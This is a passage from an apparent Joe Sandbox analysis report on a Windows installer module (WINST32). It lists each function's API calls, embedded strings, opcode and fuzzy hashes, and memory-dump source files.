                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeapItemLongMessageSendWindow
                                                                                          • String ID: buf$e:\nsmsrc\nsm\1410\1410\nt\winst32.c
                                                                                          • API String ID: 2295614352-821064217
                                                                                          • Opcode ID: 2bfade649c5aff403709b4b3a26bac09122fe1fc62d7bba7fda2d8dbeda5ce50
                                                                                          • Instruction ID: 1de512bcc0458ecdab572e3fa439a5652baf9ba5b77962290f5c8fa5b2145ba1
                                                                                          • Opcode Fuzzy Hash: 2bfade649c5aff403709b4b3a26bac09122fe1fc62d7bba7fda2d8dbeda5ce50
                                                                                          • Instruction Fuzzy Hash: 70F0F972AC531632E62032655C8FFBB2E4C9F86B50F504011F648791C3E6A45D0185B6
                                                                                          Function 005CED20 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005C8BC0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 005C8C1C
                                                                                            • Part of subcall function 005C8BC0: SHGetFolderPathW.SHFOLDER(00000000,00000026,00000000,00000000,?,?,?), ref: 005C8C5F
                                                                                            • Part of subcall function 005C8BC0: SHGetFolderPathW.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 005C8CB7
                                                                                          • wsprintfW.USER32 ref: 005CED4E
                                                                                          • wsprintfW.USER32 ref: 005CED64
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FolderPathwsprintf$FileModuleName
                                                                                          • String ID: %sNSA.LIC$%sNSM.LIC
                                                                                          • API String ID: 341647881-3388120946
                                                                                          • Opcode ID: c853f869bfd00f0f603b1a3eca580d5e8e4ab869b6eda645570d7a1ce44d8609
                                                                                          • Instruction ID: 63ee4bf1ad310d7d2f136ae262b9a27bfdfe4d27d76a5b6a581dd6cd8b743cfa
                                                                                          • Opcode Fuzzy Hash: c853f869bfd00f0f603b1a3eca580d5e8e4ab869b6eda645570d7a1ce44d8609
                                                                                          • Instruction Fuzzy Hash: DF01D8B1D0521C6ACB10EBF09C47FEF7B6DAB84304F04459DB9099B142ED71AE048AE1
                                                                                          Function 005D68C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RemoveDirectoryW.KERNEL32(0063C848,00000000,?,005DCF57), ref: 005D6961
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DirectoryRemove
                                                                                          • String ID: cic\delta.zip$cic\setup.exe$cic\setup.msi
                                                                                          • API String ID: 597925465-3980332394
                                                                                          • Opcode ID: 21e9a98c9941e4cfc25def787883347ba544dfd46ab2beef52c5e826740ecc00
                                                                                          • Instruction ID: 68c73dd8b121ad118004d4c4b4768b8cc5aa4ed6a5092f1f43c9bebea2bde7ac
                                                                                          • Opcode Fuzzy Hash: 21e9a98c9941e4cfc25def787883347ba544dfd46ab2beef52c5e826740ecc00
                                                                                          • Instruction Fuzzy Hash: 6D11C03AA00B119EC7219F2CDC2B6677BB2FF86390F055456F8428B324F7315A56C7A6
                                                                                          Function 005C2340 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005E7CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,752F55F0,?,005B97EE,00000000,?,?), ref: 005E7CE9
                                                                                          • wsprintfW.USER32 ref: 005C2398
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeapwsprintf
                                                                                          • String ID: %02x$%02x, $..\CTL32\util.cpp
                                                                                          • API String ID: 1352872168-1263427399
                                                                                          • Opcode ID: cef0cc092f2744738323f027b709845ea5f3ad3b0e88523b326c1932f5ed82a9
                                                                                          • Instruction ID: 7fcda010446415fd734f3f894151075834dc2e0bd2fbbc7ed1f14d13b13f2adc
                                                                                          • Opcode Fuzzy Hash: cef0cc092f2744738323f027b709845ea5f3ad3b0e88523b326c1932f5ed82a9
                                                                                          • Instruction Fuzzy Hash: CE012BB25042456BCB109F95DC50DDA7B9AFFD8720F194139E9098B200E575A9418BA0
                                                                                          Function 005B4330 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 005B437E
                                                                                          • GetProcAddress.KERNEL32(00000000,_TrackMouseEvent), ref: 005B439A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: _TrackMouseEvent$comctl32.dll
                                                                                          • API String ID: 2574300362-2314894490
                                                                                          • Opcode ID: 98131117563da4d5a54ae9e764896a86c0f209e73d79101fdaae7a4f0649f6f7
                                                                                          • Instruction ID: 8a1215e6d0bb20bc47be633b42a5b71d5016cdf853a3b9ba077200eca22de114
                                                                                          • Opcode Fuzzy Hash: 98131117563da4d5a54ae9e764896a86c0f209e73d79101fdaae7a4f0649f6f7
                                                                                          • Instruction Fuzzy Hash: 5D111B7090430A9FDB14DFA9D8457AE7BF6FB08304F046969E825D3251E7719640CF90
                                                                                          Function 005E0390 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindWindowExW.USER32(00000000,00000000,Shell_TrayWnd,00000000), ref: 005E03A4
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 005E03B5
                                                                                          • FindWindowExW.USER32(00000000,00000000,Shell_TrayWnd,00000000), ref: 005E03C8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$Find$Long
                                                                                          • String ID: Shell_TrayWnd
                                                                                          • API String ID: 189972333-2988720461
                                                                                          • Opcode ID: 2487019385aefe3c596c81ec37366aeb49d507d5edde8b3af81a02a309582b0b
                                                                                          • Instruction ID: 60421417c6b5bb3814ddf73b629cd44a2c68c6e250b37093412564a0e45be031
                                                                                          • Opcode Fuzzy Hash: 2487019385aefe3c596c81ec37366aeb49d507d5edde8b3af81a02a309582b0b
                                                                                          • Instruction Fuzzy Hash: 53E09233A82B7573D63111AE6C41FDB47499B99B71F261252F600BB2D086D0EC8219F4
                                                                                          Function 005B4860 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window
                                                                                          • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                          • API String ID: 2353593579-1331251348
                                                                                          • Opcode ID: c340e247231be10d23fcd7ac12f8f3f43d316f8da5df4882e36313bc233e9db5
                                                                                          • Instruction ID: 22ded5157a1dc63238cc2650d27eb0945e3a8001a6f1dbc1a4b75ceef8c0fd01
                                                                                          • Opcode Fuzzy Hash: c340e247231be10d23fcd7ac12f8f3f43d316f8da5df4882e36313bc233e9db5
                                                                                          • Instruction Fuzzy Hash: 4AF08922B8031567C6312991FC06EDB7F59ABE1F60F194135FC0866183E371B94149E6
                                                                                          Function 005B4DD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegSetValueExW.ADVAPI32(?,?,00000000,?,.HY,?,00000000,00000000,00000000,?,0059482E,?,?,00000000,U^Y), ref: 005B4DED
                                                                                            • Part of subcall function 005B4640: wvsprintfW.USER32(?,00596384,?), ref: 005B466B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Valuewvsprintf
                                                                                          • String ID: .HY$Error %d setting %s$U^Y
                                                                                          • API String ID: 140283604-1145732432
                                                                                          • Opcode ID: d844df53ea076523ac8f53a61512ab8c4a78d79d2089f422bb083a9a57fde5f0
                                                                                          • Instruction ID: 6c7a4e96689a49480621f62cb41609502a8dc8c484476806830b1f280738ebb2
                                                                                          • Opcode Fuzzy Hash: d844df53ea076523ac8f53a61512ab8c4a78d79d2089f422bb083a9a57fde5f0
                                                                                          • Instruction Fuzzy Hash: FEE065B67002197BD620DE49EC85FAB7B6CEB89B54F144015FD04D7342D670EC1086F0
                                                                                          Function 005B6310 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDeviceCaps.GDI32(?,0000000E), ref: 005B6322
                                                                                          • GetDeviceCaps.GDI32(?,0000000C), ref: 005B6329
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CapsDevice
                                                                                          • String ID: ..\CTL32\pcibmp.cpp$nColors
                                                                                          • API String ID: 328075279-4292231205
                                                                                          • Opcode ID: 1c2647ef9180bbbe29bdfb1b2b5282ffa651e79c4c9efd6364969ec8aaed0384
                                                                                          • Instruction ID: 4e79e390a2571eda794efd0cd3a89aab821af6624d4d6d037140f8f597f4ce36
                                                                                          • Opcode Fuzzy Hash: 1c2647ef9180bbbe29bdfb1b2b5282ffa651e79c4c9efd6364969ec8aaed0384
                                                                                          • Instruction Fuzzy Hash: 89E04823B4132837E61021996D46FC6F79D6B95B69F060136FF04BB2D2D5D1AD4046E0
                                                                                          Function 005D4850 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005D4877
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • MessageBoxW.USER32(00000000,?,WINST32,00000000), ref: 005D489C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$LocalMessageTimewvsprintf
                                                                                          • String ID: Assert failed, file %hs, line %d$WINST32
                                                                                          • API String ID: 3290899936-2703300672
                                                                                          • Opcode ID: f5c462b8fa6d4c3069a2638095bd7d7a0c167e790af344ff75e32f1124da2c48
                                                                                          • Instruction ID: fde164f57c5cec5a5ec7758c3680f29534db22059a3032ed370eb501b1e27b1d
                                                                                          • Opcode Fuzzy Hash: f5c462b8fa6d4c3069a2638095bd7d7a0c167e790af344ff75e32f1124da2c48
                                                                                          • Instruction Fuzzy Hash: 2BF012B994030DBBD714EFA4DC5EF99777AEB04704F00C455B7199B182E570BA448F61
                                                                                          Function 005EC921 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(mscoree.dll,?,005EC959,?,?,005F925A,000000FF,0000001E,006336B0,0000000C,005F9305,?,?,?,005F2AA8,0000000D), ref: 005EC92B
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005EC93B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 1646373207-1276376045
                                                                                          • Opcode ID: 580ae13580f5d88657e325492f98853d43fa3a2575a589d34e74197f525242d5
                                                                                          • Instruction ID: f84a9ae2ed38b5b5b233363413fc9c4d52a9b06cb3389b2f8e77551a57ee726f
                                                                                          • Opcode Fuzzy Hash: 580ae13580f5d88657e325492f98853d43fa3a2575a589d34e74197f525242d5
                                                                                          • Instruction Fuzzy Hash: F9D022302003163BCB001FE7EC48D463E0FFE80B623098010F81EC2092CEA5E811C873
                                                                                          Function 005C2FAF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 11libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 005C2FBE
                                                                                          • GetProcAddress.KERNEL32(00000000,_TrackMouseEvent), ref: 005C2FCF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: _TrackMouseEvent$comctl32.dll
                                                                                          • API String ID: 2574300362-2314894490
                                                                                          • Opcode ID: 18ddd32cadd1839d3184ba11f5bef0b2d0ce53a072379f327589e5813f1d40df
                                                                                          • Instruction ID: c48319b00525e07b636348a22eb667ee234ede81e20a8c3611216ca29c12c5fc
                                                                                          • Opcode Fuzzy Hash: 18ddd32cadd1839d3184ba11f5bef0b2d0ce53a072379f327589e5813f1d40df
                                                                                          • Instruction Fuzzy Hash: 52C012B02413015ED7105F649C59B823A6BB74070AF496409F411821A0E775C0409AB2
                                                                                          Function 005F24AD Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005F220A: GetOEMCP.KERNEL32(00000000), ref: 005F2233
                                                                                            • Part of subcall function 005F5ACE: Sleep.KERNEL32(00000000,00000001,?,?,005F9275,00000018,006336B0,0000000C,005F9305,?,?,?,005F2AA8,0000000D,?,005B97EE), ref: 005F5AEF
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 005F2523
                                                                                          • InterlockedIncrement.KERNEL32(00000000), ref: 005F2548
                                                                                          • InterlockedDecrement.KERNEL32 ref: 005F25DA
                                                                                          • InterlockedIncrement.KERNEL32(00000000), ref: 005F25FE
                                                                                            • Part of subcall function 005E79A7: HeapFree.KERNEL32(00000000,00000000,?,005F2B7C,00000000,?,005B97EE,00000000), ref: 005E79BD
                                                                                            • Part of subcall function 005E79A7: GetLastError.KERNEL32(00000000,?,005F2B7C,00000000,?,005B97EE,00000000), ref: 005E79CF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Interlocked$DecrementIncrement$ErrorFreeHeapLastSleep
                                                                                          • String ID:
                                                                                          • API String ID: 1703371082-0
                                                                                          • Opcode ID: a8846e36f1d2672013c86671ef9388b90e8e78ffbd5cd851e0732bc0a7dbbc0e
                                                                                          • Instruction ID: 6d9033be05f5a37a0bea943de4bd12abd05aeece835b24bed514650c86f2712b
                                                                                          • Opcode Fuzzy Hash: a8846e36f1d2672013c86671ef9388b90e8e78ffbd5cd851e0732bc0a7dbbc0e
                                                                                          • Instruction Fuzzy Hash: E441E2B090034A9FDB109F64D8986BA3FE1BF48310F144859E955EB3A1CB78CC41CB60
                                                                                          Function 005E6330 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateErrorInfo.OLEAUT32(00000000,?,?,?,005E5F69,?,?), ref: 005E635A
                                                                                          • SysFreeString.OLEAUT32(?), ref: 005E63EF
                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 005E63F9
                                                                                          • SysFreeString.OLEAUT32(?), ref: 005E6403
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeString$CreateErrorInfo
                                                                                          • String ID:
                                                                                          • API String ID: 3175856148-0
                                                                                          • Opcode ID: 662c08e9b34d0a88fff229636e838c02bb9f1f148e6dfed0c3d6a03d6b12e97b
                                                                                          • Instruction ID: eac98506540f6bd5ece8f365803a0b9219e68d932524b644930330b0dd0c7ae1
                                                                                          • Opcode Fuzzy Hash: 662c08e9b34d0a88fff229636e838c02bb9f1f148e6dfed0c3d6a03d6b12e97b
                                                                                          • Instruction Fuzzy Hash: 83312C75300705AFCB14DF6AD880E96BBE9FF983907148819F899CB350DB31E941CBA0
                                                                                          Function 00598BD0 Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegCloseKey.ADVAPI32(?,DE64E134), ref: 00598C11
                                                                                          • RegCloseKey.ADVAPI32(?,DE64E134), ref: 00598C1B
